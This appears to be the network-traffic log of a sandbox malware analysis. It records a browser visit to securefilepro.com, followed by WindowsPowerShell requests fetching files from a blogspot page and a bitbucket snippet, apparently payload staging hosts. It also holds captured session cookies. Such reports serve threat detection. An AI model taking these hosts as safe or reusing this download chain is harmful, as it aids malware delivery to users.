            Source: global traffic | HTTP traffic detected: GET /_Incapsula_Resource?SWKMTFSR=1&e=0.08098935374105776 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=
            Source: global traffic | HTTP traffic detected: GET /_Incapsula_Resource?SWKMTFSR=1&e=0.08098935374105776 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=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
            Source: global traffic | HTTP traffic detected: GET /assets/sfp.html HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=77u4GsdbDUAdVe76gzjhmf8C5VjeX8955GcerWQQQC+6x+nj51nDONojIDiIXXNL9z3efMJNvQRJlyJmhU95e4dDl2ZomVcJgI3yKSbULzrbL9p8E+/Xy7Tl0aO8lmfiz6juoFvLp7didL5J3sAqVUitDPwrOz/opQGvpO1ZaBS2o4pPrNFbJC7xncRcCen24CN4UmKNUfATu7jsJcFpqWGqtJv/9wzE9tv9GTUe3i9w4F6cusANAc2JknMDxulchOxsMLJbFmEpp+NVa2uTG/nve/SHGSQIn09ZVmkuXgfznnv0ZlHxacNPjyDsbFtGhuP04sK1AOEpH840odKVLheb5G4PCtSVSq1acfl2nKmr5lRK8QqkjFIriYh0TdFbcqaeHeV7Qo8y6nXLVaz8GTDx5vgCC35jyAbZkC2uJN85avJ8rcpsvhISBQqE0m2sgreayO8Xc8vcNMHhGimcKKyPN/SXeNw/4MmM92ThCVfuSlcoKnO1Vu1SpEAjudDNAmAIOtOM4LsfAD/ooK9Zbwm6tSY3KumroDkpI/iuopC9ycrAYDgblCOonDKJVOrwS2s79R1UqPIeuA4MIVYz2yU8KUs6mJ34cZUOhwL2lgy5xhEZRRmG23qliQMXll9uSxJYjqGzJoJDfuLp3o3DXcJIh6jzUGh5cHrsYh2jwE/v+IILTXIEbwj8Uk44hdAnidfORJrle/p3FIAnMA062NDn33NFqKbcksk4f7hzqRDWCh+SnnSpBgHUDaBz4ePZSXTiCOh5OPF9Po1NdRHIaB4IKjgvEM6g0+BierkXfmg6gUZ6V67TG65f8GNf8YHyQ7mjBi6dbdevC/vOMr/1d91DoQI0ykMHIHBSTIcLL2kylOeFs6kvOvtDSFHlzfF0cxPoPmyRd+iRy4+AJ5SDBMI3wIttsSnGmeXm45cuIfceq4oLkvkW0wfAkYVSLf9vfl9OX3WoCJy2spjMhR7WTdPpYnrB39kIrFo1AtJXyajP9/du9ournJC6GOx/a2RHrtY8+wcxun9NTesU5hcxeo5+55rB5Ub2A2GBtt2lFthJCYjs49OB4bmD82lzqAnRd8uxA/Fr9pn85RoNt9PpVmsmj4bm1ht8dwKxkD5XxPEYab06LmJO7r/rs3fTgkcXtaGzPpqTWkxnqvAbDcU9rlJ0o5zikqwMmguYgnSLdvxOMr6Y5KJoKVZBhc2voiRIA7pcnovblP3rc8MOXiWdu0/9h+bGEvXktxpGRPiOGRF+J+VD5C/QVD/ovPu5SL2SXix8DLkHVmh95J5JbUBwABOM38WqBafU/kPV8sfpyb1nsPI51/hq6u1pNNyaxVFBPjKcuchy6xOJI454GD+R2oJ38ABkcCL4COZBSqHjIIzmUIN7p0HcFif0pbvyLTlpsbioMUwev750CTa7U3cXuGJG2EToNTcaSdqO8d5+kW3bFwOFEypsk1FVrbr1GFT15UA8g/ip10XJI0aW719R44TRGA7Xjn1C3h/7Au7cpDQS73z/fX3pvO1w2e2FLo9mQLGKecxckcB0+nRX45Fnyd6Md4mV6Ir241r+UcFONMx/gXwHj4LPr53VW0xZXlxE/Uzrs6EqKxUTlXZC+WjjGWNYwE/bti7ATKANbGXiNSq5TnOFOLhEGPE/UzyV2VG3h1P/YDf9DEQ2MmYcEMtylYbWH5cBHg3zsavUijg5BvfZwhXVvmRntwddQY9NA41RiXj5yL3VloBwEVzm5bdIiBB6AT5r3OAB1Wq8WOU1cZ5fJuJLXGtxSigzN2xDjrmfuyKjTr1niEqHHolWVm1bznyI72XXofXKMaaczqzfkxHDbg070L2dKMnEd1cN0xns6cl2lPJOIpITtQFw69YuI/A/8TqOnCvH0ggVVBa97hiSzx6Othe+wTNVD4T/bONmIeX6DgkQqtNsZ/ViiuxH6
            Source: global traffic | HTTP traffic detected: GET /assets/sfp.html HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=77u4GsdbDUAdVe76gzjhmf8C5VjeX8955GcerWQQQC+6x+nj51nDONojIDiIXXNL9z3efMJNvQRJlyJmhU95e4dDl2ZomVcJgI3yKSbULzrbL9p8E+/Xy7Tl0aO8lmfiz6juoFvLp7didL5J3sAqVUitDPwrOz/opQGvpO1ZaBS2o4pPrNFbJC7xncRcCen24CN4UmKNUfATu7jsJcFpqWGqtJv/9wzE9tv9GTUe3i9w4F6cusANAc2JknMDxulchOxsMLJbFmEpp+NVa2uTG/nve/SHGSQIn09ZVmkuXgfznnv0ZlHxacNPjyDsbFtGhuP04sK1AOEpH840odKVLheb5G4PCtSVSq1acfl2nKmr5lRK8QqkjFIriYh0TdFbcqaeHeV7Qo8y6nXLVaz8GTDx5vgCC35jyAbZkC2uJN85avJ8rcpsvhISBQqE0m2sgreayO8Xc8vcNMHhGimcKKyPN/SXeNw/4MmM92ThCVfuSlcoKnO1Vu1SpEAjudDNAmAIOtOM4LsfAD/ooK9Zbwm6tSY3KumroDkpI/iuopC9ycrAYDgblCOonDKJVOrwS2s79R1UqPIeuA4MIVYz2yU8KUs6mJ34cZUOhwL2lgy5xhEZRRmG23qliQMXll9uSxJYjqGzJoJDfuLp3o3DXcJIh6jzUGh5cHrsYh2jwE/v+IILTXIEbwj8Uk44hdAnidfORJrle/p3FIAnMA062NDn33NFqKbcksk4f7hzqRDWCh+SnnSpBgHUDaBz4ePZSXTiCOh5OPF9Po1NdRHIaB4IKjgvEM6g0+BierkXfmg6gUZ6V67TG65f8GNf8YHyQ7mjBi6dbdevC/vOMr/1d91DoQI0ykMHIHBSTIcLL2kylOeFs6kvOvtDSFHlzfF0cxPoPmyRd+iRy4+AJ5SDBMI3wIttsSnGmeXm45cuIfceq4oLkvkW0wfAkYVSLf9vfl9OX3WoCJy2spjMhR7WTdPpYnrB39kIrFo1AtJXyajP9/du9ournJC6GOx/a2RHrtY8+wcxun9NTesU5hcxeo5+55rB5Ub2A2GBtt2lFthJCYjs49OB4bmD82lzqAnRd8uxA/Fr9pn85RoNt9PpVmsmj4bm1ht8dwKxkD5XxPEYab06LmJO7r/rs3fTgkcXtaGzPpqTWkxnqvAbDcU9rlJ0o5zikqwMmguYgnSLdvxOMr6Y5KJoKVZBhc2voiRIA7pcnovblP3rc8MOXiWdu0/9h+bGEvXktxpGRPiOGRF+J+VD5C/QVD/ovPu5SL2SXix8DLkHVmh95J5JbUBwABOM38WqBafU/kPV8sfpyb1nsPI51/hq6u1pNNyaxVFBPjKcuchy6xOJI454GD+R2oJ38ABkcCL4COZBSqHjIIzmUIN7p0HcFif0pbvyLTlpsbioMUwev750CTa7U3cXuGJG2EToNTcaSdqO8d5+kW3bFwOFEypsk1FVrbr1GFT15UA8g/ip10XJI0aW719R44TRGA7Xjn1C3h/7Au7cpDQS73z/fX3pvO1w2e2FLo9mQLGKecxckcB0+nRX45Fnyd6Md4mV6Ir241r+UcFONMx/gXwHj4LPr53VW0xZXlxE/Uzrs6EqKxUTlXZC+WjjGWNYwE/bti7ATKANbGXiNSq5TnOFOLhEGPE/UzyV2VG3h1P/YDf9DEQ2MmYcEMtylYbWH5cBHg3zsavUijg5BvfZwhXVvmRntwddQY9NA41RiXj5yL3VloBwEVzm5bdIiBB6AT5r3OAB1Wq8WOU1cZ5fJuJLXGtxSigzN2xDjrmfuyKjTr1niEqHHolWVm1bznyI72XXofXKMaaczqzfkxHDbg070L2dKMnEd1cN0xns6cl2lPJOIpITtQFw69YuI/A/8TqOnCvH0ggVVBa97hiSzx6Othe+wTNVD4T/bONmIeX6DgkQqtNsZ/ViiuxH6
            Source: global traffic | HTTP traffic detected: GET /_Incapsula_Resource?SWKMTFSR=1&e=0.08098935374105776 HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=
            Source: global trafficHTTP traffic detected: GET /assets/css/styles.css?v=1.0 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.securefilepro.com/assets/sfp.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /images/landing/get.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected:
                GET /images/landing/send.svg HTTP/1.1
                Host: d12bxbf7nz45kt.cloudfront.net
                Connection: keep-alive
                sec-ch-ua-platform: "Windows"
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                sec-ch-ua-mobile: ?0
                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                Sec-Fetch-Site: cross-site
                Sec-Fetch-Mode: no-cors
                Sec-Fetch-Dest: image
                Sec-Fetch-Storage-Access: active
                Referer: https://www.securefilepro.com/
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected:
                GET /images/landing/anytime.svg HTTP/1.1
                Host: d12bxbf7nz45kt.cloudfront.net
                Connection: keep-alive
                sec-ch-ua-platform: "Windows"
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                sec-ch-ua-mobile: ?0
                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                Sec-Fetch-Site: cross-site
                Sec-Fetch-Mode: no-cors
                Sec-Fetch-Dest: image
                Sec-Fetch-Storage-Access: active
                Referer: https://www.securefilepro.com/
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected:
                GET /images/landing/relax.svg HTTP/1.1
                Host: d12bxbf7nz45kt.cloudfront.net
                Connection: keep-alive
                sec-ch-ua-platform: "Windows"
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                sec-ch-ua-mobile: ?0
                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                Sec-Fetch-Site: cross-site
                Sec-Fetch-Mode: no-cors
                Sec-Fetch-Dest: image
                Sec-Fetch-Storage-Access: active
                Referer: https://www.securefilepro.com/
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected:
                GET /images/DrakePortals-logo.png HTTP/1.1
                Host: d12bxbf7nz45kt.cloudfront.net
                Connection: keep-alive
                sec-ch-ua-platform: "Windows"
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                sec-ch-ua-mobile: ?0
                Accept: */*
                Sec-Fetch-Site: cross-site
                Sec-Fetch-Mode: no-cors
                Sec-Fetch-Dest: object
                Sec-Fetch-Storage-Access: active
                Referer: https://www.securefilepro.com/
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected:
                GET /favicon.ico HTTP/1.1
                Host: www.securefilepro.com
                Connection: keep-alive
                sec-ch-ua-platform: "Windows"
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                sec-ch-ua-mobile: ?0
                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                Sec-Fetch-Site: same-origin
                Sec-Fetch-Mode: no-cors
                Sec-Fetch-Dest: image
                Referer: https://www.securefilepro.com/assets/sfp.html
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
                Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global traffic | HTTP traffic detected:
                GET /favicon.ico HTTP/1.1
                Host: www.securefilepro.com
                Connection: keep-alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                Accept: */*
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Sec-Fetch-Storage-Access: active
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
                Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global traffic | HTTP traffic detected:
                GET /images/landing/get.svg HTTP/1.1
                Host: d12bxbf7nz45kt.cloudfront.net
                Connection: keep-alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                Accept: */*
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Sec-Fetch-Storage-Access: active
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected:
                GET /images/landing/send.svg HTTP/1.1
                Host: d12bxbf7nz45kt.cloudfront.net
                Connection: keep-alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                Accept: */*
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Sec-Fetch-Storage-Access: active
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected:
                GET /images/landing/anytime.svg HTTP/1.1
                Host: d12bxbf7nz45kt.cloudfront.net
                Connection: keep-alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                Accept: */*
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Sec-Fetch-Storage-Access: active
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected:
                GET /images/landing/relax.svg HTTP/1.1
                Host: d12bxbf7nz45kt.cloudfront.net
                Connection: keep-alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                Accept: */*
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Sec-Fetch-Storage-Access: active
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
            Source: global traffic | HTTP traffic detected:
                GET /favicon.ico HTTP/1.1
                Host: www.securefilepro.com
                Connection: keep-alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                Accept: */*
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Sec-Fetch-Storage-Access: active
                Accept-Encoding: gzip, deflate, br, zstd
                Accept-Language: en-US,en;q=0.9
                Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global traffic | HTTP traffic detected:
                GET /faqeeer.pdf HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                Host: cpa12-march.blogspot.com
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected:
                GET /atom.xml HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                Host: cpa12-march.blogspot.com
            Source: global traffic | HTTP traffic detected:
                GET /!api/2.0/snippets/ansidjaassdasmjkkkkk/q7MRe8/3fdc148e8846d2e71b5743d242a56ff62d0a4dfc/files/file HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                Host: bitbucket.org
                Connection: Keep-Alive
            Source: global traffic | DNS traffic detected: DNS query: securefilepro.netlify.app
            Source: global traffic | DNS traffic detected: DNS query: cdn.jsdelivr.net
            Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global traffic | DNS traffic detected: DNS query: www.google.com
            Source: global traffic | DNS traffic detected: DNS query: securefilepro.com
            Source: global traffic | DNS traffic detected: DNS query: www.securefilepro.com
            Source: global traffic | DNS traffic detected: DNS query: d12bxbf7nz45kt.cloudfront.net
            Source: global traffic | DNS traffic detected: DNS query: cpa12-march.blogspot.com
            Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
